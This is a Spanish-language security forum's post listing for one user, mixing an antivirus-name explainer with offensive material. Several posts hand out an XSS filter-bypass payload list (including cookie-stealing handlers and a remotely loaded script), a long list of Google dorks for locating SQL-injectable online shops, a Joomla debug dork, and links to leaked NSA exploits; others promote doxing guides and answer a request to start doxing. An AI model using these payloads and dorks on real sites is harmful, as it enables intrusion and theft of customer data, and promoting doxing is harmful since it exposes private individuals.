Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Drok3r

Páginas 1 2 3
#41
Análisis y desarrollo de malwares / Interpretación de resultados de una detección de virus
Febrero 25, 2018, 05:46:33 PM


Gran parte del tiempo cuando realizamos una búsqueda de virus o analizamos el sistema con el antivirus, nos encontramos con una detección de un virus o malware en general y no entendemos el resultado. Cuando se detecta un virus no sabemos qué clase de virus es, cuál es su daño dentro del pc, o si solo es una falsa alarma.
Con esta información sabrás a qué clase de virus o malware te enfrentas, el daño que este ha hecho en tu pc y lo que has perdido. (Ya te tomaron fotos desnudo)

Pero antes de poder interpretar, los resultados tenemos que comprender lo siguiente. Nos basaremos en un orden, el cual usan la mayoría de los Antivirus. Plataforma, Tipo, Nombre/familia y Variante.

1.- Plataforma.
La plataforma especifica el sistema operativo, arquitectura del virus y en algunas ocasiones especifica el lenguaje de programación en el que fue diseñado. Pero también la plataforma puede ser genérica, es decir sin una plataforma especifica.
Ejemplo:
– PHP
– Win32
– Win64
– Script
– Java

2.- Tipo.
El tipo es un elemento que indica el tipo de virus con el cual estamos infectados basándose en la actividad de dicho virus.
Ejemplo:
– Trojan
– Dropper
– Worm
– Spy
– Virus

3.- Nombre/familia
Evidentemente este elemento como su nombre lo indica, especifica el nombre del virus, o identifica la familia a la que dicho virus pertenece. Esto también dependerá del antivirus.
Ejemplo:
– Inf
– Q
– GT
– F
– gen

4.- Variante
Muchos virus o malware evolucionan, ya sea porque el creador incrementa sus funcionalidades o cuando el malware cambia partes de su código para evadir la detección o simplemente para aumentar o escalar los privilegios. Esta dependerá de la base de datos del antivirus.
Ejemplo:
– [SupS]
– [Tg]
– [Heur]
– [Adw]
– [Trj]

Ahora tomaremos por ejemplo el resultado de una detección de Avast.
Deteccion de virus en Avast



En la parte que dice "Infección" podemos visualizar la información del virus.
Win32:Dropper-gen[DRP]
Con esa información y retomando lo anteriormente mencionado tenemos lo siguiente:
Plataforma = Win32
Tipo = Dropper
Nombre/Familia = gen
Variante = DRP

Al saber que la plataforma es Win32 sabemos que es un virus que está diseñado para infectar a los sistemas Windows de 32bits. El virus es un dropper el cual cumple la función de conectarse a Internet y descargar software o complementos del mismo, por lo general es usado en troyanos para instalar keylogger o backdoors.
Con esta información sabemos que nos enfrentamos a un malware que descarga software que puede ser perjudicial, en la mayoría de los casos es software para publicidad.

Y con este método o información tendremos el conocimiento de a que virus nos estamos enfrentando o que virus ya nos infectó. Esto también es útil cuando uno hace analizáis en VirusTotal u otros servicios de análisis en línea, con la información sabremos si es un malware o una falsa alarma.

Como dato extra comparto el siguiente link de PandaSecurity, el cual contiene un glosario con definiciones técnicas relacionadas a los malware y antivirus para una mejor interpretación y más conocimiento.

PandaSecurityGlosario -> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente(BLOG) -> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#42
Presentaciones y cumpleaños / Hola, me presento... :3
Febrero 24, 2018, 10:08:59 PM
Hola, soy un loco de la seguridad informatica y el buen café :3

Soy Fundador de RedBird - Seguridad Ofensiva, una pequeña organizacion que esta creciendo poco a poco, tratando temas relacionados a la seguridad web, proteccion de datos e informationGathering.

Soy miembro de estas organizaciones o empresas:

Hacking Publico & Sistemas Informaticos
DAIT -Seguridad Informatica
Instituto de Ciberseguridad
ONASSOL - Organizacion Nacional de Seguridad Y Software Libre

Soy el escritor de 3 libros..

Hola Mundo

Doxing - Tu identidad jamas sera anonima
Doxing - Burlandonos de la privacodad de Fac3book
Doxing - UserName (PROXIMAMENTE)

Soy fundador de un pequeño team llamado RedBirdTeam
#43
Dudas y pedidos generales / Re:como iniciar en doxing (twitter)
Febrero 24, 2018, 09:56:10 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
En el foro tienes material sobre Doxing y post hablando sobre redes sociales.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Y por si te interesa te dejo esto aqui:

Doxing - Burlándonos de la privacidad de Fac3book - PDF
Link de Descarga:
• No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Clave de cifrado
• !dIV_xkALC57eKKWUWCFKs6MPto4YJ3t9rvY0MOazWlM

Saludos

No esperaba que mi pdf llegara hasta aca xD
#44
Bugs y Exploits / Roxy Filemnager ckeditor Upload Shell
Febrero 23, 2018, 01:40:53 AM
Roxy Filemnager ckeditor Upload Shell



#45
Seguridad web y en servidores / Payloads XSS Filter Bypass List
Febrero 22, 2018, 11:13:16 AM
Payloads XSS Filter Bypass List



Código: text
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">


Link PasteBin
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#46
Bugs y Exploits / Re:Vulnerabilidades en JOOMLA | 18 Vulnerabilidades encontradas en Joomla
Febrero 21, 2018, 03:30:21 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Seria bueno el Dork correspondiente, aunque ultimamente he notado disminución en sitios Joomla

Estaria bien poder tener los Dorks, pero como bien dices, cada vez veo menos citios Joomla. Te comparto un dork mio igual puede ser de utilidad.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
"Consola de Joomla! Debug" inurl:index.php
#47
Dudas y pedidos generales / Re:Que ramas posee la Seguridad informatica hoy dia?
Febrero 18, 2018, 08:47:43 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

  • Auditoría de sistemas
  • Ingeniería social
  • Ingeniería inversa
  • Cross-Site scripting / SQL Injection
  • Administración de redes
  • Programación
  • Redes y antenas
  • Control de vulnerabilidades
  • Seguridad implementada
  • Vulnerability Scanning
  • Seguridad Wireless / Mobile
  • System Hacking
  • Password Cracking
  • Pasión


En sí, son muchas. Y lo recomendable es tener amplia experiencia de práctica y conocimientos generales en todas. Ya que, obviamente, amplías tu campo laboral y sobre todo, nunca sabes qué problemas puedes tener en un futuro, y necesitarás resolverlos...

Estas mal, XSS y SQL son vulnerabiliades de apliaciones web y servidor mas no son ramas de la seguridad. Si este fuera el caso por ejemplo estas son derivadas de XSS o tipos de XSS, dependiendo el vector de ataque

Cross Site Flashing (XSF)
Cross Frame Scripting (XFS)
Cross Zone Scripting (XZS)
Cross Agent Scripting (XAS)
Cross Referer Scripting (XRS)
Bypass de un login mediante SQL Injection
SQL Injection (Mediante UNION)
Serialized SQL Injection
Boolean-Base SQL Injection
Time-Base SQL Injection
Heavy-Queries SQL Injection
Stack-Queries

son vulnerabilidades, más no son ramas
#48
Dudas y pedidos generales / Re:[SOLUCIONADO] Qué ramas posee la Seguridad informática hoy día?
Febrero 18, 2018, 08:44:38 PM
Las ramas son bastantes y de cada una nacen especialidades... por ejemplo

Seguridad Web
Seguridad en Servidores
Seguridad en Redes de computadoras
Seguridad Informatica
Seguridad de la Informacion
Seguridad en desarrollo de aplicaciones
Seguridad en programacion
Seguridad en IoT (nueva)
Informatica Forense
Desarrollo de politicas de seguridad


Estas son algunas, y por ejemplo, en seguridad web, encuentras diferentes apartados, como lo son:
Seguridad web FrontEnd y BackEnd, Vulnerabilidades, metodologia y estrategias de explotacion, pruebas de penetracion a alplicaciones web, seguridad en el desarrollo de aplicaciones web, etc etc. En esto encuentras la forma de hacer un pentesting a una aplicacion, las vulnerabilidades como lo son XSS por ejemplo.
#49
Seguridad web y en servidores / Mas de 4000 dorks para SQL INJECTION
Febrero 18, 2018, 06:37:07 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una coleccion de más de 4000 dorks para SQL INJECTION y XSS entre otros. Esta recopilzacion fue realizada gracias al equipo de RedBirdTeam y TeamWhoiam.

Código: text
specials.cfm?id=
store_listing.cfm?id=
store.cfm?id=
store_bycat.cfm?id=
storefront.cfm?id=
Store_ViewProducts.cfm?Cat=
store-details.cfm?id=
StoreRedirect.cfm?ID=
storefronts.cfm?title=
storeitem.cfm?item=
subcategories.cfm?id=
tuangou.cfm?bookid=

tek9.cfm?
template.cfm?Action=Item&pid=
topic.cfm?ID=
type.cfm?iType=
view_cart.cfm?title=

updatebasket.cfm?bookid=
updates.cfm?ID=
view.cfm?cid=
view_detail.cfm?ID=
viewitem.cfm?recor=

viewcart.cfm?CartId=
viewCart.cfm?userID=
viewCat_h.cfm?idCategory=
viewevent.cfm?EventID=
WsAncillary.cfm?ID=

viewPrd.cfm?idcategory=
ViewProduct.cfm?misc=
voteList.cfm?item_ID=
whatsnew.cfm?idCategory=
WsPages.cfm?ID=HP
inurl:".php?cid="+intext:"online+betting"

inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"/store/"

inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?cid=" intext:"Buy Now"

inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cat="

inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"
inurl:".php?cat=" intext:"/store/"


Link En PasteBin: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Link de Descagra .txt: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#50
Seguridad web y en servidores / Re:Dorks XSS
Febrero 18, 2018, 05:44:06 PM
Buen post.

En mi caso, yo pondria que GoogleHacking o GooHack es una busqueda avanzada realizada en Google por medio de un con junto de parametros, los cuales nos ayudan a especificar nuestra busqueda, de tal forma que podemos tener resultados, ya sea en la URL, en el contenido textual de una pagina, un tipo de archivo o una palabra unica.

Y un dork es un conjunto de parametros, implementados en el Hacking con buscadores ya sea GoogleHacking o ShodanHacking por ejemplo. Los dorks se pueden componer por distintos parametros como inurl, intext, filetype, author, etc. Y que estos a su vez pueden ser ayudados de otros como lo son "", -, + y |

Por si les interesa:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#51
Bugs y Exploits / EternalRomance EternalSynergy y EternalChampion | Exploits de la NSA
Febrero 18, 2018, 05:13:07 PM
 
Se filtran exploit de la NSA capaz de comprometer, todas las versiones de Windows
[/b]

En el año pasado el grupo de hackers TheShadowBrokers filtraron 3 exploits de la NSA conocidos como EternalRomance, EternalSynergy y EternalChampion, los cuales ahora afectan todas las versiones de Windows partiendo de Windows 2000 en sus variantes de 32 y 64 bits.

El investigador de seguridad Sean Dillon de RiskSense, trabajo con el codigo fuente de estos exploit, para poder comprometer todas las versiones de Windows, con fines educativos y para el desarrollo de nuevas tecnicas de defensa..Sean Dillon utilizo las vulnerabilidades No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, utilizando estas vulnerabilidades y tratando el codigo logro hacerlos funcionar con Metasploit.

EXPLOITS: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#52
Bugs y Exploits / Vulnerabilidades en JOOMLA | 18 Vulnerabilidades encontradas en Joomla
Febrero 17, 2018, 07:44:06 PM
#53
Seguridad web y en servidores / Google Dorks SQL Injection & XSS Payload
Febrero 15, 2018, 09:05:05 PM
Google Dorks SQL Injection & XSS Payload

En este post, les comparto una recopilación de más de 100 dorks, para encontrar paginas vulnerables ya sea a SQL INJECTION ó XSS. En cuanto a dar con las vulnerabilidades XSS de igual manera comparto, una lista, la cual es un recopilatorio de más de 100 payloads, que podemos utilizar para dar con sitios vulnerables a XSS.

Google Dorks - SQL INJECTION
Puedes utilizar los GoogleDorks con el fin de encontrar paginas vulnerables a SQL INJECTION.



Pastebin: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

XSS Payloads
Esta lista de payloads, nos puede ayudar a encontrar paginas vulnerables a XSS, donde podremos hacer mas que un simple alert, en javascript. Podemos usar herramientas de fuerza fruta, que nos ayuden a encontrar dicha vulnerabilidad en una pagina web.

Puedes usar la herramienta BruteXSS, la cual te permite encontrar vulnerabilidades XSS por medio de fuerza bruta a una aplicacion web.



Pastebin: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga BruteXSS: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Páginas 1 2 3